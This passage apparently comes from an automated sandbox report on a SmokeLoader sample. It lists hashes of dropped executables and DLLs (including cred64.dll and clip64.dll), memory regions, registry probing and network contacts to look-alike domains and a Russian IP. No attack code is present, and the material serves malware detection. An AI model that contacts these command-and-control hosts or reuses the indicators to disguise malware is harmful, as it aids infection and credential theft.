| SHA256 | fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408 |
| SHA512 | cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319 |
memory/2312-153-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar5BC8.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar5D54.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/1548-201-0x0000000000C50000-0x0000000000D50000-memory.dmp
memory/2808-200-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1548-202-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2808-204-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2808-207-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2808-208-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2128-210-0x0000000000400000-0x0000000000644000-memory.dmp
memory/1868-227-0x0000000000230000-0x0000000000330000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DFB7.exe
| MD5 | 9e52aa572f0afc888c098db4c0f687ff |
| SHA1 | ef7c2bb222e69ad0e10c8686eb03dcbee7933c2b |
| SHA256 | 4a40f9d491f09521f4b0c6076a0eb488f6d8e1cf4b67aa6569c2ccce13556443 |
| SHA512 | d0991e682ae8c954721e905753b56c01f91b85313beb9996331793c3efa8acc13d574ef5ba44853ecc3e05822931ed655bad1924fa11b774a43e015f42185f62 |
memory/2684-235-0x0000000000A60000-0x0000000001745000-memory.dmp
memory/2684-244-0x0000000000A60000-0x0000000001745000-memory.dmp
memory/2684-273-0x00000000001D0000-0x00000000001D1000-memory.dmp
\Users\Admin\AppData\Local\Temp\DFB7.exe
| MD5 | e2ebfec64d8bd97a0f742ca80c58a2cf |
| SHA1 | 647ba7618ef94e1faf9c7bd6697a3672ce59ce51 |
| SHA256 | d26e2bdc1d1ea864335e8f261f48cfd9628eaf25f9414af05e59f780cdbbde4a |
| SHA512 | e9839a52637945d078bb54c5dcefdbc7094b5753215cac9c1053f1d34a1d833b52ff31fe0935076cdad0616fd73338ed40269462f2323373084ebf44bb8a481a |
\Users\Admin\AppData\Local\Temp\7D2.exe
| MD5 | d8133933c35b3641839b23fd75109c45 |
| SHA1 | a80e7473903a2d79fac4198bb5a80fc6ea968c87 |
| SHA256 | 9393404a775a29519a48dedcefc783a2063e69a2c66cf106d23fa4d1c60ae547 |
| SHA512 | 9bfdc4fdeaeb87c737aeb54ee0575a2bb1e0e13636a173e144f97559c88d05971910c7f3c569ba8a361eea349960eaf1066c41afafa4b4b35f8c91bdd20f66a4 |
C:\Users\Admin\AppData\Local\Temp\7D2.exe
| MD5 | 450039a02217c53bd983eaf1fd34505a |
| SHA1 | 930ed58a2f58ca7bf3e39aaee43fb541f1c6eeda |
| SHA256 | d2eacbc922f248856b860aa7c31476ae4123f97e82cf69760ef216d9dca321f0 |
| SHA512 | cf37a82ea7b64f4633ac82c73feff3f829dda279a7caeac32a4cde7b0f82a43b37f67e620677a87d2eccc0eee6f8d68d0175a086487b2174b4f30b66aa4fb080 |
memory/2684-297-0x0000000000A60000-0x0000000001745000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
| MD5 | efc1577f95c9a449fcaf9c8c4ba97486 |
| SHA1 | 9f8c996d0b1d5994449e32e32ec5b29af4f62b70 |
| SHA256 | 6ab35dffd2a577d4e2478bcfa21fd1d17fc498c57582e0caaa518ecdf5c4c037 |
| SHA512 | c97fa8c4773d9f2058ca777a4a5d786ed9c5271f15553fd66cd2b50d3edbfda4af86cd0108aa291f6373e27e7f699dd36f9537b8041044492a03bbf2c7295ba2 |
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
| MD5 | bb2197a07962bd9e84512680932621a2 |
| SHA1 | 82c0278ced2d0b9241b13860f45fc499033a0956 |
| SHA256 | ca83b6d4ac408784b71721c0b97981a55cdf14431c8754c232f77450d4254094 |
| SHA512 | 04bdf960039d489bd79bfdb6590beb2d75ebce068abd0b5726852be401b52961c60062920e40e3ad8d1ccc1fea3204f4c85d02702b2b4796a32a7a79afb2aded |
memory/668-307-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/668-308-0x0000000076FA0000-0x0000000076FA2000-memory.dmp
memory/668-309-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/668-310-0x0000000002210000-0x0000000002212000-memory.dmp
memory/668-312-0x0000000000940000-0x0000000000941000-memory.dmp
memory/668-311-0x0000000002330000-0x0000000002331000-memory.dmp
memory/668-313-0x0000000002470000-0x0000000002471000-memory.dmp
memory/668-315-0x00000000008C0000-0x00000000008C1000-memory.dmp
memory/668-316-0x0000000000930000-0x0000000000931000-memory.dmp
memory/668-314-0x0000000000560000-0x0000000000561000-memory.dmp
memory/668-317-0x0000000002460000-0x0000000002461000-memory.dmp
memory/668-319-0x00000000008D0000-0x00000000008D1000-memory.dmp
memory/668-318-0x00000000008B0000-0x00000000008B1000-memory.dmp
memory/668-320-0x00000000008E0000-0x00000000008E1000-memory.dmp
memory/668-321-0x0000000002480000-0x0000000002481000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\61F4.exe
| MD5 | 0de19cd17462ea79db1a5e5fd1d7f59f |
| SHA1 | d2b313dcfbda9a04475fc01182336b52846bbe3b |
| SHA256 | c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b |
| SHA512 | 0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c |
memory/2952-333-0x0000000000230000-0x0000000000330000-memory.dmp
memory/2952-334-0x0000000001BD0000-0x0000000001C3F000-memory.dmp
memory/2952-335-0x0000000000400000-0x00000000004AB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\70C4.exe
| MD5 | f727c0754ddda4ed6354375ab748735b |
| SHA1 | 2ad7d52a12f896817edfe511ec26212580dc5958 |
| SHA256 | 661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899 |
| SHA512 | 1193780f969653123b41f41f9f6aeb1b71752d80337fd01928dfcee4e370b49fc24da0bfab6bcfb710019301bea3800db90250b46bfae4a45e2ad6a6d73a5ce3 |
memory/832-341-0x0000000072880000-0x0000000072F6E000-memory.dmp
memory/832-340-0x0000000000800000-0x000000000089A000-memory.dmp
memory/668-347-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/2952-349-0x00000000026A0000-0x00000000026A1000-memory.dmp
memory/2952-358-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/668-359-0x0000000000570000-0x0000000000571000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
| MD5 | 98a8cb3f57539407ce621d4c6e7eca22 |
| SHA1 | cfba7b6935b6d3ccc0c468df459c9833d49fe287 |
| SHA256 | a89c33a00af285e59bf6d0c4fa32d71a7bfac103c9f69e3ec80afa84e2aa08da |
| SHA512 | 66738703799be176d5a086ed48ceac9499a88c9a2bf4b1a588f185de6f615cbc84568c07a7eb6fb3f7d5569f223a7d0f6bf49f7a44643452fabc1c22fd1efeeb |
memory/668-364-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/668-366-0x0000000002770000-0x0000000002771000-memory.dmp
memory/668-367-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/832-370-0x0000000009270000-0x00000000092B0000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2832-377-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2484-378-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2484-379-0x0000000002680000-0x00000000026C0000-memory.dmp
memory/2832-380-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2484-381-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2484-382-0x0000000002680000-0x00000000026C0000-memory.dmp
memory/2832-383-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2832-384-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2932-386-0x00000000005D0000-0x00000000006D0000-memory.dmp
memory/2932-387-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/2484-393-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2832-394-0x000000006EDE0000-0x000000006F38B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\461186416230
| MD5 | d0ba858fef58669fbe660841cc1a6157 |
| SHA1 | 224cb30a7779391b616e5bfae06a8a24b726adcb |
| SHA256 | a3dd9a8710e1f41dc5d6e8cd6e1744aa367826cb740077e22df7a6e05bf37a07 |
| SHA512 | c19800e63d295e09e6c277222c846ae3cfc4e8c3e9a278c0e620657d035d6b69b267ab2ba27a4d3f30dd332f8da74b8b0b07ed63fcb5c7ec11eaffde4fa057a5 |
memory/832-402-0x0000000072880000-0x0000000072F6E000-memory.dmp
memory/1188-408-0x00000000008F0000-0x00000000009F0000-memory.dmp
memory/832-416-0x0000000009270000-0x00000000092B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | cb253bf8a6859eadd30b4ceb66c6a588 |
| SHA1 | 7e9383d51ec36a019b5884f79a2ac2c05b4049bd |
| SHA256 | 03d2efb0706bab18e7b594b985f20bd316d9e074dc3906ebefe7ab4baffe5722 |
| SHA512 | 1291d53ee1e025889a6d2bb222eac940c4ba73ae22fd956cbc8c9e61fcc0f78c96a5277362750a5e168ab5a02b46d5d11defaca0956eae08ad546ec529a3e061 |
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 4876ee75ce2712147c41ff1277cd2d30 |
| SHA1 | 3733dc92318f0c6b92cb201e49151686281acda6 |
| SHA256 | bbfba2d40f48c16a53b5806555c08aff1982c3fe4a77964963edbab9d7e672ed |
| SHA512 | 9bf25d4d0dfebd287b0c84abb64612b3db00a26b0217490b35925e77487d6c872632c936cedf1205c46ecbf9d4dfc9bc7600bee05afc550b30ae0d0964c5afe9 |
\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | fda0cdaf875e4daf0c482875f5a231e6 |
| SHA1 | 459bd14e4b5773b333f134d4d70bcf4b94e4ece2 |
| SHA256 | b85f8c66e7ccbcf27c5b06c463d3f1fe2b5511406edbf2eaba123a6ad4aad5ed |
| SHA512 | b6dc77346f4a35a8d0808d2cbcfbcec03867c4d76d1dc488ee68b3574b45af6694f5d525047f271826f74b9993c3ad58d591e520b2808543171510f0a2af26da |
\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 646474805e0a482a64c8fb0fd24cc193 |
| SHA1 | e0f3f06273ece606c9f652b446473dcc90525279 |
| SHA256 | a35b75ae6391b97d77245a8f880ea94d31491c82b6856752a1351f58bcc965bd |
| SHA512 | b0fb54455c5e9d20f61d9aef49969d9fb84fe89fde53ea42b4b01f4822a61308018a054c16277da6b8d91b3219c55deeaf8f568ac5a7b049e3aa2b6f64d53fb0 |
\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 01a5858b5db7ecf9f3e7c5e6fd1444ca |
| SHA1 | 357d16d31867dba1119e78df7ba8559a5b6b9e24 |
| SHA256 | c14af4fa1c3a9df74306483ccee122ad9dc6849078038279db3996c02b5fc349 |
| SHA512 | 5c6f53958c33b53e166ae52fe7707cf86f158bc7f2e0bbc04ecf98f6486babf18781c5a251eb2a68f629c69f17a6c80c05162fdde4a58e48853d1b22490fddbb |
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 5bd578971972e12323f2c4033f52d7a2 |
| SHA1 | 66253c74011718950a6425c61e81ccc4ef906f0f |
| SHA256 | f0e2ed19ddddd7e5a6e46358e74088bce72d1e6028ea2db081dc311e5484f449 |
| SHA512 | 2b1ccf5dff72b3a351613819a9437cf0d3aa6e8036029e1a2f5f1636cb9ab0ced399ef70cac7d30ef2f8edabe644df9d09f39121dec4463dd521a700ea099e17 |
\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | d605ca01b165bd905586b87c5c89c276 |
| SHA1 | 092572262fb11c44cac1a51de3b2e2c26842ea68 |
| SHA256 | f9f4ccdf63431abd99696354a89696e1b53f062921c44a005f486a3e6e45346b |
| SHA512 | 243f04c10c7d2aff46a8b9700bcd23f7d2a42687279c685e6239f673683fae6a0685838dd6ac4ea4eaf78c8b64c7d0b88f4d4ce93e85161dada030aae70e5063 |
C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | c7e050428b9fa0683592b7b62064e87d |
| SHA1 | c780fed59c78e33d85610290c84043a529af9b08 |
| SHA256 | e7bd37cd12fbf47e317815c366e51f59b713ba8b55f9bf258381d6a934614df9 |
| SHA512 | a4155e248240397f19696a53eb0638a2618e41c46f2c59899e44e0f407dbfa2265ee5ea329d988b47c40de420177a9c01a40c77788229fc200811b9689b3b825 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RPTK2T6EEJKO4F1ZGR09.temp
| MD5 | 61cd8de64ade8138ac9f87c1922e1426 |
| SHA1 | 71a043d8591bd470b63f69af1a49dd365a18d07b |
| SHA256 | 3e9f3c51cf7be1d0566d3898363c96ffb33a3ac1e29a69c7e9b4ca0b6cdf887b |
| SHA512 | 048e9ac720f57bf74b584e25b7f759d4fc5a5791a8fc18f516dd02ffee541d975cba47e18f0ee14753cfda78f51674099090a3ec0dc221e98bd8e94622c55b42 |
memory/744-451-0x000000001B2B0000-0x000000001B592000-memory.dmp
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll
| MD5 | ca684dc5ebed4381701a39f1cc3a0fb2 |
| SHA1 | 8c4a375aa583bd1c705597a7f45fd18934276770 |
| SHA256 | b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2 |
| SHA512 | 8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-15 00:59
Reported
2024-03-15 01:04
Platform
win10-20240221-en
Max time kernel
299s
Max time network
299s
Command Line
Signatures
SmokeLoader
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe
"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"
C:\Users\Admin\AppData\Roaming\thdutdt
C:\Users\Admin\AppData\Roaming\thdutdt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 197.159.94.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tradein-myus.com | udp |
| US | 8.8.8.8:53 | trade-inmyus.com | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/2356-2-0x00000000001F0000-0x00000000001FB000-memory.dmp
memory/2356-1-0x00000000007D0000-0x00000000008D0000-memory.dmp
memory/2356-3-0x0000000000400000-0x0000000000720000-memory.dmp
memory/3344-4-0x0000000000BE0000-0x0000000000BF6000-memory.dmp
memory/2356-5-0x0000000000400000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Roaming\thdutdt
| MD5 | 15fbdb93344afb1b663ace05ee0d40c1 |
| SHA1 | 03cc060e4c749212cdbce07aeed5623e4f94c27e |
| SHA256 | 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50 |
| SHA512 | 60f19cc94ff20a2675f906bdd4166df49336018d7362e03386e3dc2bf886ee35e31f4d0955738bea39a0943bea03661cb00405ff03736e9c2349f24b028bcabb |
memory/1012-14-0x0000000000A50000-0x0000000000B50000-memory.dmp
memory/1012-15-0x0000000000400000-0x0000000000720000-memory.dmp
memory/3344-16-0x00000000029C0000-0x00000000029D6000-memory.dmp
memory/1012-19-0x0000000000400000-0x0000000000720000-memory.dmp